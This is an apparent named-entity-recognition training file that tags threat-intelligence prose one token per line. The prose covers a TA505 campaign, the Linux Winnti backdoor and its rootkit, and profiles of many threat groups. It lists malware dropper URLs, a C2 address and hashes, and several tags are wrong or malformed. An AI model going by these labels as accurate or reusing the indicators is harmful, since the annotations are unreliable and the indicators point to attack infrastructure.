O + +Also O +, O +some O +code O +pieces O +are O +directly O +re-used O +in O +the O + +analyzed O +campaigns O +, O +such O +as O +the O +“ O +i.cmd S-FILE +” O +and O +“ O +exit.exe S-FILE +” O +files O +, O +and O +, O +at O +the O +same O +time O +, O +some O +new O +components O +have O +been O +introduced O +, O +for O +instance O +the O +“ O +rtegre.exe S-FILE +” O +and O +the O +“ O +veter1605_MAPS_10cr0.exe S-FILE +” O +file O +. O + +During O +the O +analysis O +, O +we O +also O +noticed O +the O +“ O +veter1605_MAPS_10cr0.exe S-FILE +” O +file O +slightly O +changed O +run O +after O +run O +, O +a O +few O +hours O +after O +the O +initial O +discovery O +the O +infection O +chain O +dropped O +it O +with O +different O +icons O +, O +different O +suffix O +, O +from O +“ O +cr0 O +” O +to O +“ O +cr24 O +” O +, O +and O +appendix O +from O +“ O +veter1605_ O +” O +to O +“ O +veter2005_ O +” O +. O + +This O +may O +indicate O +the O +campaign O +is O +still O +ongoing O +. O + +The O +TA505 S-APT +group O +is O +one O +of O +the O +most O +active O +threat O +groups O +operating O +since O +2014 S-TIME +, O +it O +has O +traditionally O +targeted O +Banking O +and O +Retail O +industries O +, O +as O +we O +recently O +documented O +during O +the O +analysis O +of O +the O +“ O +Stealthy B-ACT +Email I-ACT +Stealer E-ACT +” O +part O +of O +their O +arsenal O +. O + +The O +peculiarity O +of O +this O +recent O +attack O +wave O +is O +it O +actually O +hit O +a O +company O +not O +strictly O +in O +the O +Banking O +or O +Retail O +sector O +, O +as O +they O +recently O +did O +, O +suggesting O +the O +threat O +group O +could O +be O +potentially O +widening O +their O +current O +operations O +. 
O + +Dropurl O +: O +kentona[.su S-DOM +– O +47.245.58.124 S-IP +https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe S-URL +https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe S-URL +C2: O +217[.12.201.159 S-DOM +TA505 S-APT +: O +0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325 S-SHA2 +TA505 S-APT +: O +1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b S-SHA2 +TA505 S-APT +: O +fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0 S-SHA2 +TA505 S-APT +: O +c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a S-SHA2 +TA505 S-APT +: O +5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3 S-SHA2 +. O + + +Winnti S-MAL +: O +More O +than O +just O +Windows S-OS +and O +Gates O +. O + +The O +Winnti S-MAL +malware O +family O +was O +first O +reported O +in O +2013 S-TIME +by O +Kaspersky B-SECTEAM +Lab E-SECTEAM +. O + +Since O +then O +, O +threat O +actors O +leveraging O +Winnti S-MAL +malware O +have O +victimized O +a O +diverse O +set O +of O +targets O +forvaried O +motivations O +. O + +While O +the O +name O +‘ O +Winnti S-MAL +’ O +in O +public O +reporting O +was O +previously O +used O +tosignify O +a O +single O +actor O +, O +pronounced O +divergence O +in O +targeting O +and O +tradecraft O +betweencampaigns O +has O +led O +industry O +consensus O +to O +break O +up O +the O +tracking O +of O +the O +continued O +use O +ofthe O +Winnti S-MAL +malware O +under O +different O +actor O +clusters O +. O + +The O +underlying O +hypothesis O +is O +that O +themalware O +itself O +may O +be O +shared O +( O +or O +sold O +) O +across O +a O +small O +group O +of O +actors O +. O + +In O +April B-TIME +2019 E-TIME +, O +reports O +emerged O +of O +an O +intrusion O +involving O +Winnti S-MAL +malware O +at O +a O +GermanPharmaceutical S-IDTY +company O +. 
O + +Following O +these O +reports O +, O +Chronicle S-SECTEAM +researchers O +doubled O +downon O +efforts O +to O +try O +to O +unravel O +the O +various O +campaigns O +where O +Winnti S-MAL +was O +leveraged O +. O + +Analysisof O +these O +larger O +convoluted O +clusters O +is O +ongoing O +. O + +While O +reviewing O +a O +2015 S-TIME +report O +of O +a O +Winnti S-MAL +intrusion O +at O +a O +Vietnamese S-IDTY +gaming O +company O +, O +we O +identified O +a O +small O +cluster O +of O +Winnti S-MAL +samples O +designed O +specifically O +for O +Linux S-OS +. O + +The O +following O +is O +a O +technical O +analysis O +of O +thisvariant O +. O + +The O +Linux S-OS +version O +of O +Winnti S-MAL +is O +comprised O +of O +two O +files O +: O +a O +main O +backdoor O +( O +libxselinux S-MAL +) O +and O +a O +library O +( O +libxselinux.so S-FILE +) O +used O +to O +hide O +it O +’s O +activity O +on O +an O +infected O +system O +. O +‘ O +libxselinux.so S-FILE +’ O +— O +the O +userland O +rootkit O +. O +libxselinux.so.old S-FILE +: O +11a9f798227be8a53b06d7e8943f8d68 S-MD5 +906dc86cb466c1a22cf847dda27a434d04adf065 S-SHA1 +4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a S-SHA2 +IP +. O + +Ids.me S-DOM +. O + +The O +library O +used O +to O +hide O +Winnti S-MAL +’s O +system O +activity O +is O +a O +copy O +of O +the O +open-source O +userland O +rootkit O +Azazel S-TOOL +, O +with O +minor O +changes O +. O + +When O +executed O +, O +it O +will O +register O +symbols O +for O +multiple O +commonly O +used O +functions O +, O +including O +: O +open() S-TOOL +, O +rmdir() S-TOOL +, O +and O +unlink() S-TOOL +, O +and O +modify O +their O +returns O +to O +hide O +the O +malware O +’s O +operations O +. 
O + +Distinct O +changes O +to O +Azazel S-TOOL +by O +the O +Winnti S-MAL +developers O +include O +the O +addition O +of O +a O +function O +named O +‘ O +Decrypt2 S-TOOL +’ O +, O +which O +is O +used O +to O +decode O +an O +embedded O +configuration O +similar O +to O +the O +core O +implant O +. O + +Unlike O +standard O +Azazel S-TOOL +which O +is O +configured O +to O +hide O +network O +activity O +based O +on O +port O +ranges O +, O +the O +Winnti S-MAL +modified O +version O +keeps O +a O +list O +of O +process O +identifiers O +and O +network O +connections O +associated O +with O +the O +malware O +’s O +activity O +. O + +This O +modification O +likely O +serves O +to O +simplify O +the O +operator O +’s O +sample O +configuration O +process O +by O +not O +having O +to O +denote O +specific O +ports O +to O +hide O +. O + +Strings O +within O +this O +sample O +associated O +with O +the O +malware O +’s O +operations O +are O +encoded O +using O +a O +single-byte O +XOR S-ENCR +encoding O +. O + +The O +following O +is O +an O +example O +Python S-TOOL +function O +to O +decode O +these O +strings O +. O +libxselinux.old S-FILE +: O +7f4764c6e6dabd262341fd23a9b105a3 S-MD5 +dc96d0f02151e702ef764bbc234d1e73d2811416 S-SHA1 +ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23 S-SHA2 +IP +. O + +Ids.me S-DOM +. O + +Winnti S-MAL +Linux S-OS +variant O +’s O +core O +functionality O +is O +within O +‘ O +libxselinux S-MAL +’ O +. O + +Upon O +execution O +, O +an O +embedded O +configuration O +is O +decoded O +from O +the O +data O +section O +using O +a O +simple O +XOR S-ENCR +cipher O +. O + +The O +decoded O +configuration O +is O +similar O +in O +structure O +to O +the O +version O +Kaspersky O +classifies O +as O +Winnti S-MAL +2.0, O +as O +well O +as O +samples O +in O +the O +2015 S-TIME +Novetta S-SECTEAM +report O +. 
O + +Embedded O +in O +this O +sample O +’s O +configuration O +three O +command-and-control O +server O +addresses O +and O +two O +additional O +strings O +we O +believe O +to O +be O +campaign O +designators O +. O + +Winnti S-MAL +ver.1 O +, O +these O +values O +were O +designated O +as O +‘ O +tag O +’ O +and O +‘ O +group O +’ O +. O + +For O +context O +, O +embedded O +Winnti S-MAL +campaign O +designators O +have O +ranged O +from O +target O +names O +, O +geographic O +areas O +, O +industry O +, O +and O +profanity O +. O + +Winnti S-MAL +malware O +handles O +outbound O +communications O +using O +multiple O +protocols O +including O +: O +ICMP S-PROT +, O +HTTP S-PROT +, O +as O +well O +as O +custom O +TCP S-PROT +and O +UDP S-PROT +protocols O +. O + +Use O +of O +these O +protocols O +is O +thoroughly O +documented O +in O +the O +Novetta S-SECTEAM +and O +Kaspersky S-SECTEAM +reports O +. O + +While O +the O +outbound O +communication O +mechanisms O +are O +well O +documented O +, O +less O +attention O +has O +been O +paid O +to O +a O +feature O +of O +recent O +versions O +of O +Winnti S-MAL +we O +came O +across O +in O +the O +Linux S-OS +variant O +( O +as O +well O +as O +Windows S-OS +) O +that O +allows O +the O +operators O +to O +initiate O +a O +connection O +directly O +to O +an O +infected O +host O +, O +without O +requiring O +a O +connection O +to O +a O +control O +server O +. O + +This O +secondary O +communication O +channel O +may O +be O +used O +by O +operators O +when O +access O +to O +the O +hard-coded O +control O +servers O +is O +disrupted O +. O + +Additionally O +, O +the O +operators O +could O +leverage O +this O +feature O +when O +infecting O +internet-facing O +devices O +in O +a O +targeted O +organization O +to O +allow O +them O +to O +reenter O +a O +network O +if O +evicted O +from O +internal O +hosts O +. 
O + +This O +passive O +implant O +approach O +to O +network O +persistence O +has O +been O +previously O +observed O +with O +threat O +actors O +like O +Project B-TOOL +Sauron E-TOOL +and O +the O +Lamberts S-TOOL +. O + +Initial O +technical O +information O +about O +this O +feature O +was O +shared O +by O +the O +Thyssenkrupp B-IDTY +CERT E-IDTY +in O +the O +form O +of O +an O +Nmap S-TOOL +script O +that O +could O +be O +used O +to O +identify O +Winnti S-MAL +infections O +through O +network O +scanning O +. O + +This O +script O +identifies O +infected O +hosts O +by O +first O +sending O +a O +custom O +hello O +packet O +, O +immediately O +followed O +by O +an O +encoded O +request O +for O +host O +information O +, O +and O +then O +parsing O +the O +response O +. O + +The O +initial O +request O +, O +referred O +to O +as O +the O +helo/hello O +request O +in O +the O +Nmap S-TOOL +script O +, O +is O +comprised O +of O +four O +DWORDs S-TOOL +. O + +The O +first O +three O +are O +generated O +by O +rand() S-TOOL +and O +the O +fourth O +is O +computed O +based O +on O +the O +first O +and O +third O +. O + +When O +received O +by O +a O +Winnti S-MAL +infected O +host O +, O +it O +will O +validate O +the O +received O +packet O +and O +listen O +for O +a O +second O +inbound O +request O +containing O +tasking O +. O + +This O +second O +request O +( O +Encoded O +Get O +System O +Information O +Request O +) O +is O +encoded O +using O +the O +same O +method O +as O +the O +custom O +TCP S-PROT +protocol O +used O +for O +communication O +with O +command-and-control O +servers O +, O +which O +uses O +a O +four-byte O +XOR S-ENCR +encoding O +. O + +Before O +acting O +on O +the O +request O +, O +Winnti S-MAL +will O +validate O +the O +third O +DWORD S-TOOL +contains O +the O +magic O +value O +0xABC18CBA O +before O +executing O +tasking O +. 
O + +Clusters O +of O +Winnti S-MAL +related O +activity O +have O +become O +a O +complex O +topic O +in O +threat O +intelligence O +circles O +, O +with O +activity O +vaguely O +attributed O +to O +different O +codenamed O +threat O +actors O +. O + +The O +threat O +actors O +utilizing O +this O +toolset O +have O +repeatedly O +demonstrated O +their O +expertise O +in O +compromising O +Windows S-OS +based O +environments O +. O + +An O +expansion O +into O +Linux S-OS +tooling O +indicates O +iteration O +outside O +of O +their O +traditional O +comfort O +zone O +. O + +This O +may O +indicate O +the O +OS S-TOOL +requirements O +of O +their O +intended O +targets O +but O +it O +may O +also O +be O +an O +attempt O +to O +take O +advantage O +of O +a O +security O +telemitry O +blindspot O +in O +many O +enterprises O +, O +as O +is O +with O +Penquin B-MAL +Turla E-MAL +and O +APT28 S-APT +’s O +Linux S-OS +XAgent S-TOOL +variant O +. O + +Utilizing O +a O +passive O +listener O +as O +a O +communications O +channel O +is O +characteristic O +of O +the O +Winnti S-MAL +developers O +’ O +foresight O +in O +needing O +a O +failsafe O +secondary O +command-and-control O +mechanisms O +. O + +BlackOasis S-APT +is O +a O +Middle B-LOC +Eastern E-LOC +threat O +group O +that O +is O +believed O +to O +be O +a O +customer O +of O +Gamma B-IDTY +Group E-IDTY +. O + +The O +group O +has O +shown O +interest O +in O +prominent O +figures O +in O +the O +United B-LOC +Nations E-LOC +, O +as O +well O +as O +opposition O +bloggers O +, O +activists O +, O +regional O +news O +correspondents O +, O +and O +think B-TOOL +tanks E-TOOL +. O + +A O +group O +known O +by O +Microsoft S-IDTY +as O +NEODYMIUM S-APT +is O +Oreportedly O +associated O +closely O +with O +BlackOasis S-APT +operations O +, O +but O +evidence O +that O +the O +group O +names O +are O +aliases O +has O +not O +been O +identified O +. 
O + +BRONZE B-APT +BUTLER E-APT +: O +REDBALDKNIGHT S-APT +, O +Tick S-APT +. O + +BRONZE B-APT +BUTLER E-APT +is O +a O +cyber O +espionage O +group O +with O +likely O +Chinese S-LOC +origins O +that O +has O +been O +active O +since O +at O +least O +2008 S-TIME +. O + +The O +group O +primarily O +targets O +Japanese S-LOC +organizations O +, O +particularly O +those O +in O +government S-IDTY +, O +biotechnology O +, O +electronics O +manufacturing O +, O +and O +industrial O +chemistry O +. O + +Carbanak S-APT +: O +Anunak S-APT +, O +Carbon B-APT +Spider E-APT +. O + +Carbanak S-APT +is O +a O +threat O +group O +that O +mainly O +targets O +banks O +. O + +It O +also O +refers O +to O +malware O +of O +the O +same O +name O +( O +Carbanak S-MAL +) O +. O + +It O +is O +sometimes O +referred O +to O +as O +FIN7 S-APT +, O +but O +these O +appear O +to O +be O +two O +groups O +using O +the O +same O +Carbanak  S-MAL +malware O +and O +are O +therefore O +tracked O +separately O +. O + +Gamaredon S-APT +Group O +is O +a O +threat O +group O +that O +has O +been O +active O +since O +at O +least O +2013 S-TIME +and O +has O +targeted O +individuals O +likely O +involved O +in O +the O +Ukrainian B-IDTY +government E-IDTY +. O + +GCMAN S-APT +is O +a O +threat O +group O +that O +focuses O +on O +targeting O +banks O +for O +the O +purpose O +of O +transferring B-ACT +money I-ACT +to I-ACT +e-currency I-ACT +sevises E-ACT +. O + +Gorgon B-APT +Group E-APT +is O +a O +threat O +group O +consisting O +of O +members O +who O +are O +suspected O +to O +be O +Pakistan S-LOC +based O +or O +have O +other O +connections O +to O +Pakistan S-LOC +. O + +The O +group O +has O +performed O +a O +mix O +of O +criminal B-ACT +and I-ACT +targeted I-ACT +attacks E-ACT +, O +including O +campaigns O +against O +government O +organizations O +in O +the O +United B-LOC +Kingdom E-LOC +, O +Spain S-LOC +, O +Russia S-LOC +, O +and O +the O +United B-LOC +States E-LOC +. 
O + +Sandworm B-APT +Team E-APT +: O +Quedagh S-APT +, O +VOODOO B-APT +BEAR E-APT +. O + +Sandworm B-APT +Team E-APT +is O +a O +Russian S-LOC +cyber O +espionage O +group O +that O +has O +operated O +since O +approximately O +2009 S-TIME +. O + +The O +group O +likely O +consists O +of O +Russian S-LOC +pro-hacktivists O +. O + +Sandworm B-APT +Team E-APT +targets O +mainly O +Ukrainian S-LOC +entities O +associated O +with O +energy O +, O +industrial O +control O +systems O +, O +SCADA O +, O +government O +, O +and O +media O +. O + +Sandworm B-APT +Team E-APT +has O +been O +linked O +to O +the O +Ukrainian S-LOC +energy O +sector O +attack O +in O +late O +2015 S-TIME +. O + +Scarlet B-APT +Mimic E-APT +is O +a O +threat O +group O +that O +has O +targeted O +minority B-ACT +rights I-ACT +activists E-ACT +. O + +This O +group O +has O +not O +been O +directly O +linked O +to O +a O +government O +source O +, O +but O +the O +group O +'s O +motivations O +appear O +to O +overlap O +with O +those O +of O +the O +Chinese B-IDTY +government E-IDTY +. O + +While O +there O +is O +some O +overlap O +between O +IP O +addresses O +used O +by Scarlet B-APT +Mimic E-APT and Putter B-APT +Panda E-APT +, O +it O +has O +not O +been O +concluded O +that O +the O +groups O +are O +the O +same O +. O + +Silence S-APT +is O +a O +financially O +motivated O +threat O +actor O +targeting O +financial O +institutions O +in O +different O +countries O +. O + +The O +group O +was O +first O +seen O +in O +June B-TIME +2016 E-TIME +. O + +Their O +main O +targets O +reside O +in O +Russia S-LOC +, O +Ukraine S-LOC +, O +Belarus S-LOC +, O +Azerbaijan S-LOC +, O +Poland S-LOC +and O +Kazakhstan S-LOC +. O + +They O +compromised O +various O +banking O +systems O +, O +including O +the O +Russian O +Central O +Bank O +'s O +Automated O +Workstation O +Client O +, O +ATMs O +, O +and O +card O +processing O +. O + +Threat B-APT +Group-1314 E-APT +: O +TG-1314 S-APT +. 
O + +Threat B-APT +Group-1314 E-APT +is O +an O +unattributed O +threat O +group O +that O +has O +used O + +compromised O +credentials O +to O +log O +into O +a O +victim O +’s O +remote O +access O +infrastructure O +. O + +Threat B-APT +Group-3390 E-APT +: O +TG-3390 S-APT +,Emissary B-APT +Panda E-APT +, O +BRONZE B-APT +UNION E-APT +, O +APT27 S-APT +, O +Iron B-APT +Tiger E-APT +, O +LuckyMouse S-APT +. O + +Threat B-APT +Group-3390 E-APT +is O +a O +Chinese O +threat O +group O +that O +extensively O +used O +strategic O +Web O +compromises O +to O +target O +victims O +. O + +The O +group O +has O +been O +active O +since O +at O +least O +2010 S-TIME +and O +has O +targeted O +organizations O +in O +the O +aerospace S-IDTY +, O +government S-IDTY +, O +defense S-IDTY +, O +technology S-IDTY +,O +energy S-IDTY +, O +and O +manufacturing B-IDTY +sectors E-IDTY +. O + +Thrip S-APT +is O +an O +espionage O +group O +that O +has O +targeted O +satellite O +communications O +,telecoms O +,and O +defense O +contractor O +companies O +in O +the O +U.S. B-LOC +and I-LOC +Southeast I-LOC +Asia E-LOC +. O + +The O +group O +uses O +custom O +malware O +as O +well O +as O +“ O +living O +off O +the O +land O +” O +techniques O +. O + +NEODYMIUM S-APT +is O +an O +activity O +group O +that O +conducted O +a O +campaign O +in O +May B-TIME +2016 E-TIME +and O +has O +heavily O +targeted O +Turkish O +victims O +. O + +The O +group O +has O +demonstrated O +similarity O +to O +another O +activity O +group O +called O +PROMETHIUM S-APT +due O +to O +overlapping O +victim O +and O +campaign O +characteristics O +. O + +NEODYMIUM S-APT +is O +reportedly O +associated O +closely O +with O +BlackOasis S-APT +operations O +, O +but O +evidence O +that O +the O +group O +names O +are O +aliases O +has O +not O +been O +identified O +. 
O + +Night B-APT +Dragon E-APT +is O +a O +campaign O +name O +for O +activity O +involving O +a O +threat O +group O +that O +has O +conducted O +activity O +originating O +primarily O +in O +China S-LOC +. O + +OilRig S-APT +: O +IRN2 S-APT +, O +HELIX B-APT +KITTEN E-APT +, O +APT34 S-APT +. O + +OilRig S-APT +is O +a O +suspected O +Iranian O +threat O +group O +that O +has O +targeted O +Middle B-LOC +Eastern E-LOC +and O +international O +victims O +since O +at O +least O +2014 S-TIME +. O + +The O +group O +has O +targeted O +a O +variety O +of O +industries O +, O +including O +financial S-IDTY +, O +government S-IDTY +, O +energy S-IDTY +, O +chemical S-IDTY +, O +and O +telecommunications S-IDTY +, O +and O +has O +largely O +focused O +its O +operations O +within O +the O +Middle B-LOC +East E-LOC +. O + +It O +appears O +the O +group O +carries O +out O +supply B-ACT +chain I-ACT +attacks E-ACT +, O +leveraging O +the O +trust O +relationship O +between O +organizations O +to O +attack O +their O +primary O +targets O +. O + +FireEye S-SECTEAM +assesses O +that O +the O +group O +works O +on O +behalf O +of O +the O +Iranian B-IDTY +government E-IDTY +based O +on O +infrastructure O +details O +that O +contain O +references O +to O +Iran S-LOC +, O +use O +of O +Iranian O +infrastructure O +, O +and O +targeting O +that O +aligns O +with O +nation-state O +interests O +. O + +This O +group O +was O +previously O +tracked O +under O +two O +distinct O +groups O +, O +APT34 S-APT +and O +OilRig S-APT +, O +but O +was O +combined O +due O +to O +additional O +reporting O +giving O +higher O +confidence O +about O +the O +overlap O +of O +the O +activity O +. O + +APT16 S-APT  +is O +a O +China S-LOC +based O +threat O +group O +that O +has O +launched O +spearphishing B-ACT +campaigns E-ACT +targeting O +Japanese O +and O +Taiwanese O +organizations O +. O + +APT17 S-APT +: O +Deputy B-APT +Dog E-APT +. 
O + +APT17 S-APT  +is O +a O +China S-LOC +based O +threat O +group O +that O +has O +conducted O +network B-ACT +intrusions E-ACT +against O +U.S. S-LOC +government O +entities O +, O +the O +defense O +industry O +, O +law B-IDTY +firms E-IDTY +, O +information B-IDTY +technology I-IDTY +companies E-IDTY +, O +mining B-IDTY +companies E-IDTY +, O +and O +non-government O +organizations O +. O + +APT18 S-APT +: O +TG-0416 S-APT +, O +Dynamite B-APT +Panda E-APT +, O +Threat B-APT +Group-0416 E-APT +. O + +APT18 S-APT is +a O +threat O +group O +that O +has O +operated O +since O +at O +least O +2009 S-TIME +and O +has O +targeted O +a O +range O +of O +industries O +, O +including O +technology +, O +manufacturing O +, O +human O +rights O +groups +, O +government O +, O +and O +medical +. O + +Group5 S-APT +is O +a O +threat O +group O +with O +a O +suspected O +Iranian O +nexus O +, O +though O +this O +attribution O +is O +not O +definite O +. O + +The O +group O +has O +targeted O +individuals O +connected O +to O +the O +Syrian O +opposition O +via O +spearphishing S-ACT +and O +watering B-ACT +holes E-ACT +, O +normally O +using O +Syrian O +and O +Iranian O +themes O +. O + +Group5 S-APT +has O +used O +two O +commonly O +available O +remote B-MAL +access I-MAL +tools E-MAL +( O +RATs S-MAL +) O +, njRAT S-MAL and NanoCore S-MAL +, O +as O +well O +as O +an O +Android B-MAL +RAT E-MAL +, O +DroidJack S-MAL +. O + +Honeybee is O +a O +campaign O +led O +by O +an O +unknown O +actor O +that O +targets O +humanitarian O +aid O +organizations O +and O +has O +been O +active O +in O +Vietnam S-LOC +, O +Singapore S-LOC +, O +Argentina S-LOC +, O +Japan S-LOC +, O +Indonesia S-LOC +, O +and O +Canada S-LOC +. O + +It O +has O +been O +an O +active O +operation O +since O +August B-TIME +of I-TIME +2017 E-TIME +and O +as O +recently O +as O +February B-TIME +2018 E-TIME +. 
O + +Group7 S-APT +: O +APT15 S-APT +, O +Mirage S-APT +, O +Vixen B-APT +Panda E-APT +, O +GREF S-APT +, O +Playful B-APT +Dragon E-APT +, O +RoyalAPT S-APT +. O + +Ke3chang  S-APT +is O +a O +threat O +group O +attributed O +to O +actors O +operating O +out O +of O +China S-LOC +. O + +Ke3chang  S-APT +has O +targeted O +several O +industries O +, O +including O +oil O +, O +government O +, O +military O +, O +and O +more O +. O + +Kimsuky S-APT +: O +Velvet B-APT +Chollima E-APT +. O + +Kimsuky S-APT +is O +a O +North B-LOC +Korean E-LOC +based O +threat O +group O +that O +has O +been O +active O +since O +at O +least O +September B-TIME +2013 E-TIME +. O + +The O +group O +focuses O +on O +targeting O +Korean B-IDTY +think I-IDTY +tank E-IDTY +as O +well O +as O +DPRK/nuclear-related B-IDTY +targets O +. O + +The O +group O +was O +attributed O +as O +the O +actor O +behind O +the O +Korea B-IDTY +Hydro I-IDTY +& I-IDTY +Nuclear I-IDTY +Power I-IDTY +Co.compromise E-IDTY +. O + +Lazarus B-APT +Group E-APT +: O +HIDDEN B-APT +COBRA E-APT +, O +Guardians B-APT +of I-APT +Peace E-APT +, O +ZINC S-APT +, O +NICKEL B-APT +ACADEMY E-APT +. O + +Lazarus B-APT +Group E-APT +is O +a O +threat O +group O +that O +has O +been O +attributed O +to O +the O +North B-IDTY +Korean I-IDTY +government E-IDTY +. O + +The O +group O +has O +been O +active O +since O +at O +least O +2009 S-TIME +and O +was O +reportedly O +responsible O +for O +the O +November B-TIME +2014 E-TIME +destructive O +wiper B-ACT +attack E-ACT +against O +Sony B-IDTY +Pictures I-IDTY +Entertainment E-IDTY +as O +part O +of O +a O +campaign O +named O +Operation B-ACT +Blockbuster E-ACT +by O +Novetta S-SECTEAM +. 
O + +Malware O +used O +by O +Lazarus B-APT +Group E-APT +correlates O +to O +other O +reported O +campaigns O +, O +including O +Operation B-MAL +Flame E-MAL +, O +Operation B-MAL +1Mission E-MAL +, O +Operation B-MAL +Troy E-MAL +, O +DarkSeoul S-MAL +, O +and O +Ten B-MAL +Days I-MAL +of I-MAL +Rain E-MAL +. O + +In O +late B-TIME +2017 E-TIME +, O +Lazarus B-APT +Group E-APT +used O +KillDisk S-MAL +, O +a O +disk-wiping O +tool O +, O +in O +an O +attack O +against O +an O +online O +casino O +based O +in O +Central B-LOC +America E-LOC +. O + +North B-LOC +Korean E-LOC +group O +definitions O +are O +known O +to O +have O +significant O +overlap O +, O +and O +the O +name O +Lazarus B-APT +Group E-APT +is O +known O +to O +encompass O +a O +broad O +range O +of O +activity O +. O + +Some O +organizations O +use O +the O +name O +Lazarus B-APT +Group E-APT +to O +refer O +to O +any O +activity O +attributed O +to O +North B-LOC +Korea E-LOC +. O + +Some O +organizations O +track O +North B-LOC +Korean E-LOC +clusters O +or O +groups O +such O +as O +Bluenoroff S-APT +, O +APT37 S-APT +, O +and O +APT38 S-APT +separately O +, O +while O +other O +organizations O +may O +track O +some O +activity O +associated O +with O +those O +group O +names O +by O +the O +name O +Lazarus B-APT +Group E-APT +. O + +Leafminer S-APT +: O +Raspite S-APT +. O + +Leafminer S-APT +is O +an O +Iranian S-LOC +threat O +group O +that O +has O +targeted O +government O +organizations O +and O +business O +entities O +in O +the O +Middle B-IDTY +East E-IDTY +since O +at O +least O +early B-TIME +2017 E-TIME +. O + +Elderwood S-APT +: O +Elderwood B-APT +Gang E-APT +, O +Beijing B-APT +Group E-APT +, O +Sneaky B-APT +Panda E-APT +. O + +Elderwood S-APT +is O +a O +suspected O +Chinese O +cyber O +espionage O +group O +that O +was O +reportedly O +responsible O +for O +the O +2009 S-TIME +Google S-IDTY +intrusion O +known O +as O +Operation O +Aurora O +. 
O + +The O +group O +has O +targeted O +defense B-IDTY +organizations E-IDTY +, O +supply O +chain O +manufacturers O +, O +human O +rights O +and O +nongovernmental O +organizations O +( O +NGOs O +) O +, O +and O +IT O +service O +providers O +. O + +Equation S-APT +is O +a O +sophisticated O +threat O +group O +that O +employs O +multiple O +remote B-MAL +access I-MAL +tools E-MAL +. O + +The O +group O +is O +known O +to O +use O +zero-day B-VULNAME +exploits E-VULNAME +and O +has O +developed O +the O +capability O +to O +overwrite O +the O +firmware O +of O +hard O +disk O +drives O +. O + +FIN10 S-APT +is O +a O +financially O +motivated O +threat O +group O +that O +has O +targeted O +organizations O +in O +North B-LOC +America E-LOC +since O +at O +least O +2013 S-TIME +through O +2016 S-TIME +. O + +The O +group O +uses O +stolen O +data O +exfiltrated O +from O +victims O +to O +extort O +organizations O +. O + +Orangeworm S-APT +is O +a O +group O +that O +has O +targeted O +organizations O +in O +the O +healthcare O +sector O +in O +the B-LOC +United I-LOC +States E-LOC +, O +Europe S-LOC +, O +and O +Asia S-LOC +since O +at O +least O +2015 S-TIME +, O +likely O +for O +the O +purpose O +of O +corporate O +espionage O +. O + +Patchwork S-APT +: O +Dropping B-APT +Elephant E-APT +, O +Chinastrats S-APT +, O +MONSOON S-APT +, O +Operation B-APT +Hangover E-APT +. O + +Patchwork S-APT +is O +a O +cyberespionage O +group O +that O +was O +first O +observed O +in O +December B-TIME +2015 E-TIME +. O + +While O +the O +group O +has O +not O +been O +definitively O +attributed O +, O +circumstantial O +evidence O +suggests O +the O +group O +may O +be O +a O +pro-Indian O +or O +Indian O +entity O +. O + +Patchwork S-APT +has O +been O +seen O +targeting O +industries O +related O +to O +diplomatic S-IDTY +and O +government B-IDTY +agencies E-IDTY +. 
O + +Much O +of O +the O +code O +used O +by O +this O +group O +was O +copied O +and O +pasted O +from O +online O +forums O +. O + +Patchwork S-APT +was O +also O +seen O +operating O +spearphishing S-ACT +campaigns O +targeting O +U.S. S-LOC +think O +tank O +groups O +in O +March B-TIME +and I-TIME +April I-TIME +of I-TIME +2018 E-TIME +. O + +PittyTiger S-APT +is O +a O +threat O +group O +believed O +to O +operate O +out O +of O +China S-LOC +that O +uses O +multiple O +different O +types O +of O +malware O +to O +maintain O +command O +and O +control O +. O + +Unknown O +. O + +Release_Time O +: O +unknow O +Report_URL O +: O +https://attack.mitre.org/groups/ O +APT19 S-APT +: O +Codoso S-APT +, O +C0d0so0 S-APT +, O +Codoso B-APT +Team E-APT +, O +Sunshop B-APT +Group E-APT +. O + +APT19 S-APT is +a O +Chinese-based O +threat O +group O +that O +has O +targeted O +a O +variety O +of O +industries O +, O +including O +defense O +, O +finance O +, O +energy O +, O +pharmaceutical O +, O +telecommunications O +, O +high O +tech O +, O +education O +, O +manufacturing O +, O +and O +legal O +services O +. O + +In O +2017 S-TIME +, O +a O +phishing B-ACT +campaign E-ACT +was O +used O +to O +target O +seven O +law O +and O +investment O +firms O +. O + +Some O +analysts O +track APT19 S-APT and Deep B-APT +Panda E-APT as +the O +same O +group O +, O +but O +it O +is O +unclear O +from O +open O +source O +information O +if O +the O +groups O +are O +the O +same O +. O + +APT28 S-APT +: O +SNAKEMACKEREL S-APT +, O +Swallowtail S-APT +, O +Group B-APT +74 E-APT +, O +Sednit S-APT +, O +Sofacy S-APT +, O +Pawn B-APT +Storm E-APT +, O +Fancy B-APT +Bear E-APT +, O +STRONTIUM S-APT +, O +Tsar B-APT +Team E-APT +, O +Threat B-APT +Group-4127 E-APT +, O +TG-4127 S-APT +. 
O + +APT28 S-APT is +a O +threat O +group O +that O +has O +been O +attributed O +to O +Russia's B-IDTY +Main I-IDTY +Intelligence I-IDTY +Directorate I-IDTY +of I-IDTY +the I-IDTY +Russian I-IDTY +General I-IDTY +Staff E-IDTY +by O +a O +July B-TIME +2018 E-TIME +U.S. B-IDTY +Department I-IDTY +of I-IDTY +Justice E-IDTY +indictment O +. O + +This O +group O +reportedly O +compromised O +the O +Hillary O +Clinton O +campaign O +, O +the O +Democratic B-IDTY +National I-IDTY +Committee E-IDTY +, O +and O +the O +Democratic B-IDTY +Congressional I-IDTY +Campaign I-IDTY +Committee E-IDTY +in O +2016 S-TIME +in O +an O +attempt O +to O +interfere O +with O +the O +U.S. S-LOC +presidential O +election O +. O + +APT28 S-APT  +has O +been O +active O +since O +at O +least O +2004 S-TIME +. O + +APT29 S-APT +: O +YTTRIUM S-APT +, O +The B-APT +Dukes E-APT +, O +Cozy B-APT +Bear E-APT +, O +CozyDuke S-APT +. O + +APT29 S-APT  +is O +threat O +group O +that O +has O +been O +attributed O +to O +the O +Russian B-IDTY +government E-IDTY +and O +has O +operated O 